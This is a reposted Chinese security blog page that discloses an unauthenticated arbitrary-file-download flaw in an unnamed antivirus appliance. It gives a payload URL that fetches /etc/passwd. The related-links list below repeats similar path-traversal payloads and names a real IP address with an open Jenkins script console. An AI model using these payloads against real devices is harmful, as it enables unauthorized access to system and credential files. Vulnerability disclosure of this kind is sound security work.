某安全设备未授权访问+任意文件下载0day

最新推荐文章于 2024-02-07 09:10:04 发布
最新推荐文章于 2024-02-07 09:10:04 发布
阅读量284 收藏
点赞数
原文链接:http://www.cnblogs.com/sevck/p/11393099.html
版权

具体是哪家就不说了,硬件盒子,主要检测病毒。

payload如下:

 https://xxx.xxx.xxx.xxx/downTxtFile.php?filename=/etc/passwd

 

比较简单,当时有获取报告的功能,自己传入的物理路径,可以未授权访问直接下载设备上的文件。

转载于:https://www.cnblogs.com/sevck/p/11393099.html

angaoux03775
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现】若依系统后台任意文件读取漏洞
晚风不及你
02-27 1324
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
Wavlink导出日志配置授权访问下载(含批量验证poc)
最新发布
weixin_43567873的博客
04-06 36
Wavlink导出日志配置授权访问下载(含批量验证poc)
MrWQ#vulnerability-paper#若依 CMS 0day 任意文件读取 or 授权访问1
07-25
文章来源:Khan 安全攻防实验室若依管理系统后台任意文件读取若依管理系统授权访问
授权下载导致的信息泄露
weixin_53884648的博客
04-18 448
常见漏洞发掘之授权访问、下载
授权访问漏洞
weixin_43873557的博客
02-05 759
授权概述 授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导 致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信 息泄露。 Redis 授权访问漏洞 MongoDB 授权访问漏洞 Jenkins 授权访问漏洞 Memcached 授权访问漏洞 JBOSS 授权访问漏洞 VNC 授权访问漏洞 Docker 授权访问漏洞 ZooKeeper 授权访问漏洞 Rsync 授权访问漏洞 Atlassian Crowd 授权访问漏洞 CouchDB
Apache Solr最新版任意文件读取0day1
08-03
在最新的版本中,报告了一个授权任意文件读取0day漏洞,该漏洞允许攻击者通过特定的请求获取服务器上的任意文件内容,即使在默认配置下。以下是关于这个漏洞的详细解释和复现步骤。 0x01 正文全版本任意文件...
核弹级漏洞通告 _ Spring RCE 0day漏洞_0day安全
09-22
继2021年底由阿里发现的Log4j的严重漏洞之后, Spring框架也被发现了一个重大的安全漏洞。目前这个漏洞的名称被称为“SpringShell: Spring Core RCE 0-day Vulnerability”
【漏洞复现】斐讯FIR151M路由器授权下载漏洞
晚风不及你
02-07 624
斐讯数据通信技术有限公司成立于2009年,是为用户提供智慧家庭领域智能产品和云服务的科技创新性企业。
授权和敏感文件泄露
Fiverya的博客
02-03 1259
常见授权和敏感文件泄露漏洞
【漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 927
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
ZooKeeper通过ACL修复授权访问漏洞
05-06
ZooKeeper通过ACL修复授权访问漏洞,此文档适合学习
uWSGI授权访问漏洞 漏洞复现
ADummy的博客
03-04 319
uWSGI授权访问漏洞 by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。就像Fastcgi一样,uwsgi不仅是应用程序名称,还是前端服务器和后端应用程序容器之间的交换标准。 uWSGI允许通过Magic Variables动态配置后端Web应用程序。如果端口暴露在外,攻击者可以构造uwsgi数据包并指定magic变量UWSGI_FILE,从
Weblogic 两处授权任意文件上传漏洞(CVE-2018-2894)
SoulCat
02-11 3474
Weblogic 授权任意文件上传漏洞(CVE-2018-2894) 漏洞概述: -WebLogic 存在两个授权访问页面分别为/ws_utc/begin.do,/ws_utc/config.do,通过该两个页面可以直接上传webshell. 漏洞版本: weblogic 10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3 漏洞搭建: https://vulhub.or...
Vmware vcenter授权任意文件/RCE漏洞的复现与分析
weixin_46236101的博客
02-28 4287
0x01 背景 vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。 vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。授权的攻击者可以通过开放443端口的服务器向vCenter Server发送
内网渗透常见授权访问
weixin_40766105的博客
01-03 4779
1.zookeeper授权访问 开放端口:2181 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。 它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定...
授权访问漏洞总结
热门推荐
hackerie的博客
12-28 1万+
目前主要存在授权访问漏洞的有:NFS服务,Samba服务,LDAP,Rsync,FTP,GitLab,Jenkins,MongoDB,Redis,ZooKeeper, ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等, 本文主要介绍一些目前比较常用的一些服务的授权访问,欢迎大家补充! 参考:https://www.secpu
凡诺CMS 授权访问+文件包含Getshell
大方子
08-15 1623
文档:凡诺CMS的 授权访问+文件包含Getshel... 链接: http://note.youdao.com/noteshare?id=9b868e32f61ce8a3c5d78daa555c9600&sub=2A1E7A660C2743C9BB0A7A6F739C1E0C
FOFA搜索语法笔记
u011975363的专栏
06-22 4747
fofa: body=“webui/js/jquerylib/jquery-1.7.2.min.js” 构造访问 /webui/?g=sys_dia_data_down&file_name=…/etc/passwd
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值